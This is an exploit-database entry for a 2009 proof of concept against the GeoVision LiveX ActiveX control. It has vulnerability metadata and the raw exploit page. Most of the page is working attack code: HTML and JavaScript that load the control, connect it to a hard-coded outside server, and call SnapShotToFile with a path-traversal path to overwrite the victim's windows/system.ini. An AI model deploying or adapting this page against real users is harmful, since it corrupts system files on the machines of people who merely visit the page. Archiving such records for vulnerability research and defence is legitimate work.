GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc

vendor:

LiveX_v8200 ActiveX Control

by:

Nine:Situations:Group::SnoopyAssault

7.5

CVSS

HIGH

Remote File Corruption

264

CWE

Product Name: LiveX_v8200 ActiveX Control

Affected Version From: LiveX_v7000

Affected Version To: LiveX_v8120

Patch Exists: NO

Related CWE: N/A

CPE: 8D58D690-6B71-4ee8-85AD-006DB0287BF1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: IE8b/xpsp3

2009

GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc

This proof-of-concept (PoC) code connects to a live demo server and replaces system.ini with jpeg content. It is working against IE8b/xpsp3, safe for scripting and for initialization. LiveX_v7000 and LiveX_v8120 with clsids {DA8484DE-52DB-4860-A986-61A8682E298A} and {F4421170-DB22-4551-BBFB-FFCFFB419F6F} have the same SnapShotToFile() and SnapShotX() methods.

Mitigation:

Ensure that the application is not vulnerable to remote file corruption attacks by using secure coding practices and validating user input.

Source

Exploit-DB raw data:

<!--
GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc
by Nine:Situations:Group::SnoopyAssault
site: http://retrogod.altervista.org/

working against IE8b/xpsp3, safe for scripting and for initialize.
LiveX_v7000 with clsid {DA8484DE-52DB-4860-A986-61A8682E298A}
LiveX_v8120 with clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F}
have the same SnapShotToFile() and SnapShotX() methods

this poc connects to a live demo server and replaces system.ini with jpeg content...
could we set arbitrary content (???) ... maybe trough a fake server, checking ...
-->
<html>
<head>
<script language="JavaScript">
function sleep(n)
{
    var now = new Date();
    var exitTime = now.getTime() + (n*1000);
    while (true) {
        now = new Date();
            if (now.getTime() > exitTime) return;
    }
}
</script>
</head>
<body>
	<object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300">
            <param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server -->
            <param name="DisablePWD" value="-1">
            <param name="UserName" value="wec">
            <param name="Password" value="">
          	<param name="CommandPort" value="4550">
			<param name="DataPort" value="5550">
			<param name="AudioDataPort" value="6550">
			<param name="BandWidth" value="LAN">
			<param name="FixSize" value="0">
			<param name="FixWidth" value="320">
			<param name="FixHeight" value="240">
			<param name="SvrType" value="0">
			<param name="AutoLogin" value="0">
			<param name="DefaultCam" value="1">
			<param name="AutoReConnect" value="-1">
			<param name="MaxRetries" value="-1">
			<param name="RetryInterval" value="70">
          </object>
<script language="JavaScript">
  sleep(2);
  //WebCamX1.SetCntDeviceType(0);
  //WebCamX1.EnableAutoScreenSize(1);
  //WebCamX1.SetInfo(125,1,0,"","");
  //WebCamX1.SetInfo(129,1,0,"","");	
  //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0);
  //WebCamX1.DefaultCam = 1;
  WebCamX1.PlayX();
  sleep(2);
  WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini");
  WebCamX1.SnapShotX();
</script>    		
</body>
</html>

# milw0rm.com [2009-02-16]